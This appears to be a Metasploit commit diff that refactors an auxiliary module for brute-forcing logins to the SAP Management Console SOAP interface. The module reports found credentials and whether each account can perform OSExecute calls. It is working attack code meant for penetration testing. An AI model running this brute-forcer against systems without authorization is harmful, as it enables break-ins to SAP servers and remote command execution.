Land rapid7#3422, SAP Bruterforcer datastore cleanup

Author: firefart

modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb

@@ -16,13 +16,10 @@ def initialize
     super(
       'Name'           => 'SAP Management Console Brute Force',
       'Description'    => %q{
-        This module simply attempts to brute force the username |
-        password for the SAP Management Console SOAP Interface. By
-        setting the SAP SID value, a list of default SAP users can be
-        tested without needing to set a USERNAME or USER_FILE value.
-        The default usernames are stored in
-        ./data/wordlists/sap_common.txt (the value of SAP SID is
-        automatically inserted into the username to replce <SAPSID>).
+        This module simply attempts to brute force the username and
+        password for the SAP Management Console SOAP Interface. If
+        the SAP_SID value is set it will replace instances of <SAPSID>
+        in any user/pass from any wordlist.
         },
       'References'     =>
         [
@@ -36,49 +33,43 @@ def initialize
     register_options(
       [
         Opt::RPORT(50013),
-        OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', '']),
-        OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
+        OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]),
+        OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
+        OptPath.new('USER_FILE', [ false, "File containing users, one per line",
+                                   File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ])
       ], self.class)
     register_autofilter_ports([ 50013 ])
   end
 
-  def run_host(ip)
+  def run_host(rhost)
+    uri = normalize_uri(target_uri.path)
     res = send_request_cgi({
-      'uri'     => normalize_uri(datastore['URI']),
+      'uri'     => uri,
       'method'  => 'GET'
-    }, 25)
+    })
 
     if not res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{peer} [SAP] Unable to connect")
       return
     end
 
-    if datastore['SAP_SID'] != ''
-      if !datastore['USER_FILE'].nil?
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
-      elsif !datastore['USERPASS_FILE'].nil?
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
-      else
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Setting default SAP wordlist")
-        datastore['USER_FILE'] = Msf::Config.data_directory + '/wordlists/sap_common.txt'
-      end
-    end
+    print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID']
 
     each_user_pass do |user, pass|
-      enum_user(user,pass)
+      enum_user(user,pass,uri)
     end
 
   end
 
-  def enum_user(user, pass)
+  def enum_user(user, pass, uri)
 
     # Replace placeholder with SAP SID, if present
-    if datastore['SAP_SID'] != ''
+    if datastore['SAP_SID']
       user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
       pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
     end
 
-    print_status("#{rhost}:#{rport} - Trying username:'#{user}' password:'#{pass}'")
+    print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'")
     success = false
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -103,7 +94,7 @@ def enum_user(user, pass)
 
     begin
       res = send_request_raw({
-        'uri'      => normalize_uri(datastore['URI']),
+        'uri'      => uri,
         'method'   => 'POST',
         'data'     => data,
         'headers'  =>
@@ -113,9 +104,9 @@ def enum_user(user, pass)
             'Content-Type'   => 'text/xml; charset=UTF-8',
             'Authorization'  => 'Basic ' + user_pass
           }
-      }, 45)
+      })
 
-      return if not res
+      return unless res
 
       if (res.code != 500 and res.code != 200)
         return
@@ -136,17 +127,17 @@ def enum_user(user, pass)
       end
 
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP #{rhost}] Unable to connect")
+      print_error("#{peer} [SAP] Unable to connect")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] Successful login '#{user}' password: '#{pass}'")
+      print_good("#{peer} [SAP] Successful login '#{user}' password: '#{pass}'")
 
       if permission
-        vprint_good("#{rhost}:#{rport} [SAP] Login '#{user}' authorized to perform OSExecute calls")
+        vprint_good("#{peer} [SAP] Login '#{user}' authorized to perform OSExecute calls")
       else
-        vprint_error("#{rhost}:#{rport} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
+        vprint_error("#{peer} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
       end
 
       report_auth_info(
@@ -160,10 +151,9 @@ def enum_user(user, pass)
         :target_host => rhost,
         :target_port => rport
       )
-      return
     else
-      vprint_error("#{rhost}:#{rport} [SAP] failed to login as '#{user}':'#{pass}'")
-      return
+      vprint_error("#{peer} [SAP] failed to login as '#{user}':'#{pass}'")
     end
   end
 end
+